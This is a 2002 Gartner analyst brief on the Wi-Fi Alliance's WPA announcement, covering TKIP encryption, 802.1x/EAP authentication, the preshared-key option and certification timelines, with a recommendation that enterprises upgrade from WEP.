Use WPA to improve wireless LAN security



On 31 October 2002, the Wi-Fi Alliance (a nonprofit body that certifies IEEE 802.11 products) announced WPA, a security offering based on IEEE standards. WPA, which replaces WEP, works with established products and will likely appear in Wi-Fi-certified products in 1Q03. Most vendors will likely offer firmware and software updates for products.

First Take

The Wi-Fi Alliance has responded to security vulnerabilities in WEP, which is based on the 802.11 specification. WPA enables 802.11i-based Temporal Key Integrity Protocol (TKIP) encryption and 802.1x/Extensible Authentication Protocol (EAP) authentication before approval of the full 802.11i standard. TKIP overcomes the static key problems that made WEP vulnerable to hackers and delivers adequate levels of encryption and authentication for most enterprise requirements. It will support frequent changing of the encryption algorithm keys used in wireless LANs (WLANs). 802.1x/EAP supports mutual authentication of client and host, thus preventing potential “man in the middle” vulnerabilities where intruders masquerade as hosts and try to capture passwords.

WPA works with RADIUS, Kerberos and other authentication servers, which many large enterprises already use. (Most vendors, though, have implemented support only for RADIUS in their access points.) For smaller enterprises, WPA offers a “preshared key” option where a password is manually configured in the access point and clients so as to remove the need for an authentication server. This password generates the TKIP keys, thus still offering the full WPA security on the radio link.

TKIP, 802.1x and EAP are not new – the significance of this announcement is that the Wi-Fi Alliance will begin certifying WPA products in February 2003. Doing so will guarantee interoperability and remove another barrier to viable multivendor WLANs. According to the Wi-Fi Alliance, WPA will be mandatory for Wi-Fi certification before the end of 2003, and eventually products will have to ship with WPA turned on. These requirements will go a long way toward resolving the most common WLAN security risk – equipment reverting to an insecure default mode.

WPA will arrive as software upgrades for Wi-Fi certified products. Gartner recommends that enterprises install WPA as soon as it’s available if they use only the WEP security solution.

Analytical Sources: Andy Rolfe, Ken Dulaney and John Pescatore, Gartner Research

Recommended Reading and Related Research

“Securing Public WLANs: VPNs Won’t Solve Everything” – Open hot spot networks expose a PC to hacker attacks, including exposed drive shares and port-based attacks; personal firewalls are critical safety mechanisms. By Martin Reynolds

“Three False Remote-Access Security Assumptions” – Enterprises must anticipate vulnerabilities – such as unauthorized remote access, rogue WLAN access points and undervalued and unguarded information – and take appropriate, preventive measures. By John Girard

(You may need to sign in or be a Gartner client to access all of this content.)

Entire contents